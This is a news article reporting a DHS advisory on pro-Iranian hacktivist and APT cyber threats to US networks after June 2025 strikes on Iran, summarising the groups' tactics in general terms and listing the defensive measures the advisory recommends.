US Networks Under Attack – Homeland Security Issues Alert on Pro-Iranian Hacktivists

The United States is facing a sharp increase in cyber threats as the Department of Homeland Security (DHS) issued a formal advisory warning of low-level cyberattacks targeting US networks by pro-Iranian hacktivist groups.

The advisory, published against the backdrop of escalating kinetic and cyber hostilities between the US and Iran, highlights threats including distributed denial-of-service (DDoS) campaigns, exploitation of operational technology (OT) devices, and espionage targeting the defense sector.

These developments follow recent missile strikes by Iran’s Islamic Revolutionary Guard Corps (IRGC) on US military bases in Iraq and Qatar, in retaliation to US strikes on three Iranian nuclear facilities on June 22, 2025.

Key hacktivist collectives named in the DHS advisory include Team 313, a pro-Iranian group claiming responsibility for a recent DDoS attack on the Truth Social platform, citing the US missile attacks as motivation.

Other active groups include Handala, a pro-Palestinian collective targeting Israeli organizations with data theft, and Predatory Sparrow, a pro-Israeli group that has disrupted Iranian banks and cryptocurrency exchanges.

While the immediate cyber battlefield essentially involves the US, Israel, and Iran, the DHS warns that US-based organizations, especially those with business ties to Israel or those utilizing Israeli equipment, will likely see retaliatory cyber activity in the coming weeks.

Technical Analysis: Tactics, Techniques, and Procedures (TTPs) in the Spotlight

Iranian-affiliated threat actors, including advanced persistent threat (APT) groups such as APT34, APT35, and CyberAv3ngers, are employing a wide range of cyber operations.

Spearphishing, drive-by compromises, and exploitation of internet-facing operational technology (such as programmable logic controllers, PLCs, and human-machine interfaces, HMIs) are among their most common tactics.

Notably, the CyberAv3ngers group has previously attacked US water and wastewater facilities by exploiting default credentials on internet-connected OT devices, underscoring the risk to critical infrastructure.

DDoS attacks, the simplest disruptive method in their toolkit, are being increasingly used to target organizations supporting US or Israeli interests, as was evident in the Truth Social outage attributed to Team 313.

Additionally, Iranian APTs, such as APT34, are running strategic espionage campaigns that utilize spearphishing, PowerShell-based fileless malware, and stolen credentials for lateral movement within victim networks.

APT35, meanwhile, is known for its sophisticated phishing campaigns, which sometimes involve distributing malware via password-protected archives, and for scanning public systems for critical vulnerabilities, such as Log4j and ProxyShell.

Mitigation and Protection: Shielding US Networks from Attack

To counter these evolving threats, the DHS recommends a robust, multilayered cybersecurity strategy.

Organizations are encouraged to implement cloud-based DDoS protection, traffic filtering, and web application firewalls to manage high volumes of malicious requests.

Non-essential online services, especially those linked to OT, should be promptly disabled. Critical OT devices must be updated with unique, strong credentials, and all public-facing authentication portals reviewed for weak or default passwords.

Regular employee training, network segmentation, and vulnerability patching are further emphasized to reduce exposure to spearphishing and drive-by compromises.

For organizations in critical sectors such as energy, finance, and telecom, these steps are vital to prevent operational disruption, data breaches, and reputational damage.

As geopolitical tensions continue to unfold, U.S. entities must remain vigilant, leveraging threat intelligence and proactive security measures to safeguard not only their own assets but also the broader stability of American infrastructure and the economy.